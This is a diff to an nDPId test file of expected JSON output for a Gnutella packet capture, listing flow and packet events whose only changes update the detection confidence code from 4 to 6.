00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":95754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95754,"pkt":"UlQAEjUCCAAn5uVZCABFAABt5WoAAIARNr4KAAIPR+3KW3AJPvUAWTG5sdMxAjDioXa7maFRwy28tUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":95754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95754,"pkt":"UlQAEjUCCAAn5uVZCABFAABtX54AAIARHeoKAAIPXNlUEHAJTv8AWaUwJBUxAlN7nQQgyNq1K1wDakQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1245,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.217.84.16","src_port":28681,"dst_port":20223,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":2,"flow_last_seen":95773,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95773,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBAsAAEARB2mwY7AUCgACDxjKcAkC343Vw\/gxApkT0lWtd136yOWRcEQAAMACAAAGR1RLRwAA8snLCFuSuhsM38lDoCe4Q7IZIaMEsGOwFBjKAQAAAARm60BZFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":95784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95784,"pkt":"UlQAEjUCCAAn5uVZCABFAABtMiYAAIARW8MKAAIPXjZCUnAJ+JUAWU8lLkYxAuq77b+oti7DkMaMrEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.54.66.82","src_port":28681,"dst_port":63637,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":95784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95784,"pkt":"UlQAEjUCCAAn5uVZCABFAABtkeMAAIARbpoKAAIPYOzNB3AJh+oAWd3xqy0xAvOz2v7bFV7JjaoOuEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.236.205.7","src_port":28681,"dst_port":34794,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":95784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95784,"pkt":"UlQAEjUCCAAn5uVZCABFAABtcekAAIARV2IKAAIPrbe3bnAJ6hAAWRURh5oxAjZAPvXTOccHXf+KmUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95784,"flow_last_seen":95784,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95784,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":2,"flow_last_seen":95818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95818,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBA0AAEARtvVc2VQQCgACD07\/cAkC3\/0wJBUxAlN7nQQgyNq1K1wDakQAAMACAAAGR1RLRwAA9cCVEE\/2P06nFdVsmWWAWjUBRZwEXNlUEE7\/AQAAAATtCo4VFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":2,"flow_last_seen":95892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95892,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBA8AAEAROelg7M0HCgACD4fqcAkC3\/BRqy0xAvOz2v7bFV7JjaoOuEQAAMACAAAGR1RLRwAA+Ts9p8WeGiSZuDZKSPQI3121aXEEYOzNB4fqAQAAAASVRD4TFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo4w=="} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":95893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95893,"pkt":"UlQAEjUCCAAn5uVZCABFAABtptYAAIAR2P0KAAIPpIQKGXAJ2AYAWVxSIsUxAlnYy6KYCQUz3Ng+pkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":95893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95893,"pkt":"UlQAEjUCCAAn5uVZCABFAABtLrQAAIARfUcKAAIPuezIiXAJvA4AWfki1SYxAiU091nTuxkeneMv2EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":95893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95893,"pkt":"UlQAEjUCCAAn5uVZCABFAABtxQIAAIAR4QoKAAIPvKXLvnAJVesAWQc1IDExAvwLw9eirMeJjOQnPkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 